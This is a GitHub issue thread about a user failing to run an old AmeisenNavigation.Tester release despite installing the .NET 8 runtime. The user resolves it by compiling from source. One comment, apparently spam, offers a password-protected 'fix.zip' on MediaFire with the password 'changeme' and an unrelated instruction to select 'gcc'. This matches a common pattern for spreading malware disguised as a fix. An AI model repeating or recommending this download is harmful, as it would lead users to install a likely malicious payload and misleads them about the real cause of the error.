### ISSUE TITLE
AmeisenNavigation.Tester .Net Desktop Runtime

### ISSUE THREAD

**Issue by zuernerd** [Jnnshschl/AmeisenNavigation#11]
I'm not able to run the .exe out of the 1.8.3.2 Release. I'm having the following error although I already installed the x86 version of the v8.0.0 Desktop runtime.
![image](https://github.com/user-attachments/assets/47734f08-6347-4ab5-ab32-32a4213e47b9)

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by zuernerd** [comment]
Just realised that this is quite an old release anyways so i compiled it and therefore got it working
